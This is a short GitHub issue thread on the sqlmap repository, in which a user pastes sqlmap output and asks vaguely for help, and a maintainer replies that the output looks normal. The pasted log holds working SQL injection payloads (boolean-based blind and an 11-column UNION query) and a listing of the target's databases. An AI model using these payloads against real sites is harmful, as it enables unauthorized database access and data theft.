### ISSUE TITLE
sqlmap problem

### ISSUE THREAD

**Issue by madalin23** [sqlmapproject/sqlmap#2773]
Hello there every site i want to go in the database i receive a message like this : 
sqlmap -u .....  --dbs
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 05:23:09

[05:23:10] [INFO] resuming back-end DBMS 'mysql' 
[05:23:19] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cat (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 4185=4185

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: cat=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71627a7671,0x62586b6c50686f526442564b43684c4950565952565754686c625979514b7a534e52566f48427553,0x7162717871),NULL,NULL-- vzsj
---
[05:23:29] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5
[05:23:29] [INFO] fetching database names
available databases [2]:
[*] acuart
[*] information_schema

[05:23:29] [INFO] fetched data logged to text files under '/root/.sqlmap/output/....'
what can i do? Thanks

**Comment by stamparm** [comment]
This looks good. You haven't described what's the problem. This kind of issues tend to be closed instantly
